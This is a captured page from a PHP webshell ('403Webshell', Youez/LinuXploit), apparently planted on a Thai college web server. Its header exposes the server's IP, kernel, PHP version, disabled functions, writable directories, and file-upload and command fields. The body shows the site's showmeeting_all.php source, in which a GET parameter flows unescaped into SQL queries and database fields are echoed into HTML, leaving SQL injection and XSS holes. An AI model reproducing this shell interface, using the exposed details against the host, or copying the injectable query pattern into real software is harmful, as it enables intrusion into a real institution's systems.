403Webshell
Server IP : 202.29.229.35  /  Your IP : 3.139.64.42
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/showmeeting_all.php
 <div class="box">
  	<div style="width: 100%;">
  	  <table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td><div class="fdefault fbold txt-topic display-inline-block" style="width: 500px;" >กิจกรรมโครงการ</div></td>
        <td align="right" valign="top"><div class="fgray" style="line-height: 20px;"> <a href="?i=tab_meeting"  class="link-orange">ย้อนกลับ...</a></div></td>
      </tr>
    </table>
    <div class="line-bottom-red display-inline-block" style="width: 700px;" ></div>
    <div class="link-default-org" style="margin-bottom: 5px; padding:5px">
<?php
function check_pic($id){

		if ($handle = opendir('system_admin/pic_meeting/')) {
			while (false !== ($entry = readdir($handle))) {
				if ($entry != "." && $entry != "..") {
					//strpos();
					$entry_array = explode("_",$entry);
					if($id == $entry_array[0]){
						$name[]= $entry;
					}
				}
			}
			closedir($handle);
			if(count($name) > 0){
				return $name;
			}else{
				return false;
			}
			}
}

		//include("connect/connect.php");
		//include("connect/function.php");
		
		$m_ID=$_GET['mID'];
		//echo "====>".$nID;
		
		$sql="select * from tbl_meeting where m_ID='$m_ID' ";
		$result=mysql_query($sql);
		$rs=mysql_fetch_array($result);
		
		$mid=$rs['m_ID'];
		$dp_ID=$rs['dp_ID'];
		$adID=$rs['ad_ID'];
		 $dstart=displaydatethai($rs['m_durationStart']);
		 $dendstart=displaydatethai($rs['m_durationEnd']);
		
		//-------เจ้าของงาน
		$sqldp="select * from tbladmin where addepartmentID='$dp_ID' ";
		$resultdp=mysql_query($sqldp);
		$rsdp=mysql_fetch_array($resultdp);
		
		//------------แก้ไขงานล่าสุดโดยคัย
		$sqldpup="select * from tbladmin where adID='$adID' ";
		$resultdpup=mysql_query($sqldpup);
		$rsdpup=mysql_fetch_array($resultdpup);
		
 
?>
      <table width="700" border="0" align="center" cellpadding="5" cellspacing="0">
        <tr>
          <td colspan="2" align="center" valign="top"><h2>ผลสรุปการดำเนินโครงการ</h2></td>
        </tr>
        <tr>
          <td align="left" valign="top">&nbsp;</td>
          <td align="left" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td  width="150" align="left" valign="top">ชื่อโครงการ</td>
          <td  width="550"align="left" valign="top"><?php echo $rs['m_proName'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">&nbsp;</td>
          <td width="550" align="left" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ผุ้รับผิดชอบ</td>
          <td width="550" align="left" valign="top"><?php echo $rs['m_perResponsible'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ระยะเวลาดำเนินการ</td>
          <td width="550" align="left" valign="top"><?php echo $dstart;?> ถึง <?php echo $dendstart;?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">สถานที่ดำเนินการ</td>
          <td width="550" align="left" valign="top"><?php echo $rs['m_location'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">วัตถุประสงค์</td>
          <td width="550" align="left" valign="top"><?php echo $rs['m_objective'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ค่าใช้จ่าย</td>
          <td width="550" align="left" valign="top"><?php echo number_format($rs['m_expense'], 2, '.', ',');?>&nbsp;บาท</td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ผลที่ได้รับ</td>
          <td width="550" align="left" valign="top"><?php echo $rs['m_benefits'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ผุ้เข้าร่วมโครงการ</td>
          <td width="550" align="left" valign="top"><?php echo $rs['m_participant'];?></td>
        </tr>
        <tr>
          <td width="150" align="left" valign="top">ข้อเสนอแนะ</td>
          <td width="550" align="left" valign="top"><?php if($rs['m_comment'] !=""){ echo $rs['m_comment'];}else{ echo "-";}?></td>
        </tr>
        <tr>
          <td align="left" valign="top">ผลการประเมิน</td>
          <td align="left" valign="top"><?php if($rs['m_score'] !=""){ echo "อยู่ในระดับ".$rs['m_score'];}else{ echo "-";}?></td>
        </tr>
        <tr>
          <td align="left" valign="top">download file</td>
          <td align="left" valign="top"><?php if($rs['filemeeting'] !=""){ ?>
            <a href="system_admin/filepdf_meeting/<?php echo $rs['filemeeting'];?>" target="_blank">ไฟล์โครงการที่เกี่ยวข้อง</a>
            <?php  }else{ echo "-";}?></td>
        </tr>
      </table>
      <p>&nbsp;</p>
      <table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="left" valign="top"><?php
        	$pic = check_pic($mid);
			if($pic != ""){
		 	foreach($pic as $item){
	 		//$pic_big= '<img src="img/'.$item.' " width="200px" height="150px">';
  //}
						
	
		
        ?>
            <!-----------------------------------------------เริ่มแสดงความเห็นใต้ภาพ---------------------------------------------->
            <a rel="example_group" href="system_admin/pic_meeting/<?php echo $item;?>" title=""><img src="system_admin/pic_meeting/<?php echo $item;?>" alt="" width="150px" height="120" style="border:1px solid #CCCCCC; padding:4px"/></a>
            <?php		

		  		}//foreach
				}//endif
		?></td>
        </tr>
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top"><i><font size="-2" color="#999999">นำเข้าข้อมูลเมื่อ : <?php echo displaydate($rs['m_Date']);?>&nbsp;&nbsp;แหล่งที่มา :
            <?php if($rs['dp_ID'] >=29){ echo "แผนกวิชา".$rsdp['addepartment'];}else{ echo $rsdp['addepartment'];}?>
            | ปรับปรุงข้อมูลล่าสุดโดย :
            <?php if($rsdpup['adID'] != 1){ echo "แผนกวิชา".$rsdpup['addepartment'];}else{ echo $rsdpup['addepartment'];}?>
          </font></i></td>
        </tr>
      </table>

    </div>
  </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit